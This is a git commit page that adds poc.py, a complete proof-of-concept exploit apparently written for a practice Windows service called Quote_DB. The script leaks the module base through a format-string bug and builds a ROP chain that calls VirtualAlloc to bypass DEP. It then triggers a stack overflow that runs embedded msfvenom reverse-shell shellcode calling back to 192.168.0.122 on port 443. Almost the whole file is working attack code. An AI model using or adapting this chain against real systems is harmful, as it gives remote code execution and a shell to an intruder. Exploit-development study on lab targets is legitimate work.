STRLCPY/quote_db

Sample exploit added
William Moody committed 3 years ago

0a1c7fef

1 parent 96a7fa45

Total 1 files

■ ■ ■ ■ ■ ■

poc.py

1	+	#!/usr/bin/python3
2	+
3	+	# Quote_DB PoC
4	+	# William Moody, 07.06.2021
5	+
6	+	from functools import update_wrapper
7	+	import socket
8	+	import sys
9	+	from struct import pack, unpack
10	+
11	+	if len(sys.argv) != 2:
12	+	print("Usage: %s server" % sys.argv[0])
13	+	sys.exit(1)
14	+
15	+	server = sys.argv[1]
16	+	port = 3700
17	+
18	+	# ===
19	+
20	+	def send(opcode, data):
21	+	buf = pack("<I", opcode)
22	+	buf += data
23	+
24	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25	+	s.connect((server, port))
26	+	s.send(buf)
27	+
28	+	try:
29	+	ret = s.recv(16384)
30	+	s.close()
31	+
32	+	return ret
33	+	except:
34	+	return None
35	+
36	+	# ===
37	+
38	+	def get_quote(index):
39	+	return send(901, pack("<I", index))
40	+
41	+	def add_quote(quote):
42	+	return send(902, quote)
43	+
44	+	def bad_request(buf):
45	+	return send(800, buf)
46	+
47	+	# ===
48	+
49	+	print("[+] Getting base address...")
50	+
51	+	quote_id = unpack("<I", add_quote(b"%x " * 30))[0]
52	+	base_str = get_quote(quote_id).split(b" ")[8].decode()
53	+	base = (int(base_str, 16) // 0x10000) * 0x10000
54	+
55	+	print(" -- " + hex(base))
56	+
57	+	# ===
58	+
59	+	size = 5000
60	+	ropSize = 500
61	+
62	+	# ===
63	+
64	+	# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.122 LPORT=443 EXITFUNC=thread -f python -v shell
65	+	shell = b"\x90" * 20
66	+	shell += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
67	+	shell += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
68	+	shell += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
69	+	shell += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
70	+	shell += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
71	+	shell += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
72	+	shell += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
73	+	shell += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
74	+	shell += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
75	+	shell += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
76	+	shell += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
77	+	shell += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
78	+	shell += b"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
79	+	shell += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
80	+	shell += b"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
81	+	shell += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8"
82	+	shell += b"\x00\x7a\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56"
83	+	shell += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c"
84	+	shell += b"\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5"
85	+	shell += b"\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
86	+	shell += b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
87	+	shell += b"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
88	+	shell += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
89	+	shell += b"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
90	+	shell += b"\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6"
91	+	shell += b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
92	+	shell += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
93	+
94	+	# ===
95	+
96	+	rop = [
97	+	# 1. Get ESP (in eax)
98	+	base + 0x2610, # xor eax, eax ; ret
99	+	base + 0x1eb1, # or eax, esp ; ret
100	+
101	+	# 2. Get dummy call addr (in ebx)
102	+	base + 0x2b88, # pop ecx ; ret
103	+	0x1ec, # eax + ? = dummy call
104	+	base + 0x9b86, # add eax, ecx ; pop ebx ; ret
105	+	0xffffffff, # junk for pop ebx
106	+	base + 0x1ebb, # mov ebx, eax ; ret
107	+
108	+	# 3. Deref virtualAlloc (in eax)
109	+	base + 0x2b87, # pop eax ; pop ecx ; ret
110	+	base + 0x4321c, # base + iat + virtualalloc
111	+	0xffffffff, # junk for pop ecx
112	+	base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret
113	+	0xffffffff, # junk for pop edx
114	+
115	+	# 4. Write virtual alloc to dummy
116	+	base + 0x1ec2, # mov [ebx], eax ; ret
117	+
118	+	# 5. Get shellcode addr (in eax)
119	+	base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
120	+	base + 0x2d3c, # mov eax, edx ; ret
121	+	base + 0x2b88, # pop ecx ; ret
122	+	0x18, # eax + ? = dummy call
123	+	base + 0x9b86, # add eax, ecx ; pop ebx ; ret
124	+	0xffffffff, # junk for pop ebx
125	+	base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
126	+
127	+	# 6. Get dummy call addr + 0x4 (in ebx)
128	+	base + 0x1eca, # add ebx, 0x4 ; ret
129	+
130	+	# 7. Write shellcode addr to dummy + 0x4
131	+	base + 0x1ec2, # mov [ebx], eax ; ret
132	+
133	+	# 8. Get dummy call addr + 0x8 (in ebx)
134	+	base + 0x1eca, # add ebx, 0x8 ; ret
135	+
136	+	# 9. Write shellcode addr to dummy + 0x8
137	+	base + 0x1ec2, # mov [ebx], eax ; ret
138	+
139	+	# 10. Align esp with dummy call (ebx-8)
140	+	base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
141	+	base + 0x2b88, # pop ecx ; ret
142	+	0xfffffff8, # edx + ? = dummy call
143	+	base + 0x1ece, # add edx, ecx ; ret
144	+	base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
145	+	base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret
146	+	]
147	+	rop = b"".join([pack("<I", r) for r in rop])
148	+
149	+	# ===
150	+
151	+	dummy = b"aaaa" # VirtualAlloc
152	+	dummy += b"bbbb" # return <- shellcode addr
153	+	dummy += b"cccc" # lpAddress <- shellcode addr
154	+	dummy += pack("<I", 0x1) # dwSize <- 0x1
155	+	dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000
156	+	dummy += pack("<I", 0x40) # flProtect <- 0x40
157	+
158	+	# ===
159	+
160	+	buf = b"A" * 2060
161	+	buf += rop
162	+	buf += b"B" * (ropSize - len(rop))
163	+	buf += dummy
164	+	buf += shell
165	+
166	+	# ===
167	+
168	+	print("[+] Triggering overflow...")
169	+
170	+	bad_request(buf)

Sample exploit added